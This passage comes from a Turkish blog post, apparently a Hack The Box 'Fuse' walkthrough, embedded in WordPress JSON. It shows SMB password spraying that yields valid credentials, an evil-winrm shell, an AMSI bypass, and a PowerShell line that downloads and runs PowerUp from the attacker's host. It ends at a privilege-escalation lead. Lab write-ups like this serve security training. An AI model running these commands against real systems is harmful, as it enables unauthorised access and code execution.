FUSE             [-] fabricorp.local\\krbtgt:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\DefaultAccount:$fab@s3Rv1ce$1 STATUS_LOGON_FAILURE \nSMB         10.10.10.193    445    FUSE             [+] fabricorp.local\\svc-print:$fab@s3Rv1ce$1 <\/code><\/pre>\n<p>Harika! winrm kontrol\u00fc ger\u00e7ekle\u015ftirelim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.193]\n\u2514\u2500# crackmapexec winrm 10.10.10.193 -u svc-print -p &#039;$fab@s3Rv1ce$1&#039;                                                                                                                                                                         \nWINRM       10.10.10.193    5985   FUSE             [*] Windows 10.0 Build 14393 (name:FUSE) (domain:fabricorp.local)\nWINRM       10.10.10.193    5985   FUSE             [*] http:\/\/10.10.10.193:5985\/wsman\nWINRM       10.10.10.193    5985   FUSE             [+] fabricorp.local\\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)\n<\/code><\/pre>\n<p>Art\u0131k makineye ba\u011flanabiliriz.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                                                                                                                                                                           \n\u2514\u2500# evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'                                                                                                                                                                               \n\nEvil-WinRM shell v3.3                                                                                                                                                                                                                                                                                                                                                                                                                     \nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                                                  \nData: For more information, check Evil-WinRM Github: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion                                                                                                                                                    \nInfo: Establishing connection to remote endpoint                                                                                                                                                                                                                         \n*Evil-WinRM* PS C:\\Users\\svc-print\\Documents> whoami\nfabricorp\\svc-print<\/code><\/pre>\n<p>Daha sonras\u0131nda flagimi okudum ve inceleme yapmaya ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">*Evil-WinRM* PS C:\\Users\\svc-print\\Documents> Bypass-4MSI\n[+] Success!\n\n*Evil-WinRM* PS C:\\Users\\svc-print\\Documents> iex ((New-Object Net.WebClient).DownloadString('http:\/\/10.10.14.28\/PowerUp.ps1'));\n*Evil-WinRM* PS C:\\Users\\svc-print\\Documents> Invoke-PrivescAudit\n\nPrivilege   : SeLoadDriverPrivilege\nAttributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED\nTokenHandle : 7116\nProcessId   : 4044\nName        : 4044\nCheck       : Process Token Privileges\n\nAccess denied \nAt line:2066 char:21\n+     $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...\n+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException\n    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\nAccess denied \nAt line:2133 char:5\n+     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...\n+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException\n    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\nCannot open Service Control Manager on computer '.'. This operation might require other privileges.\nAt line:2189 char:5\n+     Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeCo ...\n+     ~~~~~~~~~~~\n    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException\n    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand                                                                                                                                \nModifiablePath    : C:\\Users\\svc-print\\AppData\\Local\\Microsoft\\WindowsApps\nIdentityReference : FABRICORP\\svc-print\nPermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}\n%PATH%            : C:\\Users\\svc-print\\AppData\\Local\\Microsoft\\WindowsApps\nName              : C:\\Users\\svc-print\\AppData\\Local\\Microsoft\\WindowsApps\nCheck             : %PATH% .dll Hijacks\nAbuseFunction     : Write-HijackDll -DllPath 'C:\\Users\\svc-print\\AppData\\Local\\Microsoft\\WindowsApps\\wlbsctrl.dll'                                                                                                                            \n\nDefaultDomainName    : FABRICORP\nDefaultUserName      : administrator\nDefaultPassword      :\nAltDefaultDomainName :\nAltDefaultUserName   :\nAltDefaultPassword   :\nCheck                : Registry Autologons\n<\/code><\/pre>\n<p>Burdan sonraki olay kolay ancak uzun. Bildi\u011fim bir sald\u0131r\u0131 oldu\u011fu i\u00e7in ve \u00fc\u015fendi\u011fim i\u00e7in makineyi yar\u0131m b\u0131rakt\u0131m. Driver y\u00fckleme yetkimiz var. Anahtar kelimemiz `<strong>SeLoadDriverPrivilege<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Fuse &#8211; HTB Zor Windows Walkthrough nmap taramas\u0131: Not shown: 65514 filtered ports PORT STATE SERVICE VERSION 53\/tcp open domain&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/29\/fuse\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Fuse<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,498],"tags":[617,616],"class_list":["post-1572","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-walkthrough","tag-kerbrute","tag-seloaddriverprivilege","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1572"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1572\/revisions"}],"predecessor-version":[{"id":1573,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1572\/revisions\/1573"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1572"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}